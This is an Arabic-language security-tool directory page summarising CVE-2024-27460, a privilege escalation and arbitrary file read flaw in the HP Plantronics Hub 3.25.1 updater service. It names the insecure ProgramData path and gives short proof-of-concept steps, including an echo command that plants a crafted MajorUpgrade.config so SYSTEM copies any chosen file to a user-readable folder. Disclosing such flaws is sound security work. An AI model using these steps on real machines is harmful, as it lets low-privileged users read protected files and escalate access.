Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-27460 — تصعيد الامتيازات في HP Plantronics Hub 3.2.1 Updater | Kitploit
أدوات/GitHubGitHub/alaatk/cve-2024-27460
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالاختبار الاختراقالفريق الأحمر
GitHubalaatk/cve-2024-27460

CVE-2024-27460

تصعيد الامتيازات في HP Plantronics Hub 3.2.1 Updater

عرض المستودع
4منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-27460

HP Plantronics Hub 3.25.1 Updater - تصعيد الامتيازات / قراءة ملف تعسفية

الوصف:

يعاني HP Plantronics Hub 3.25.1 من خلل يسمح للمستخدمين ذوي الصلاحيات المنخفضة بقراءة ملفات تعسفية بصلاحية النظام (SYSTEM) على الجهاز المثبت عليه التطبيق. بالإضافة إلى ذلك، يمكن إساءة استخدام هذا الخلل لتصعيد الامتيازات إلى مستخدم النظام.

الإصدارات المتأثرة

HP Plantronics Hub 3.25.1

الخدمة(الخدمات) المتأثرة

المسار غير الآمن: "C:\ProgramData\Plantronics\Spokes3G"

الخدمة: PlantronicsUpdateService

خطوات إعادة الإنتاج (POC):

  • افتح cmd.exe
  • انتقل باستخدام cd C:\ProgramData\Plantronics\Spokes3G
  • echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config
  • سيتم نسخ الملف المطلوب إلى "C:\Program Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp"، وهو مسار يمكن لأي مستخدم موثق الوصول إليه.

تم الاكتشاف بواسطة:

  • فاريد زروق من Deloitte Belgium
  • علاء كشوح من Mastercard Europe
تنزيل الأداة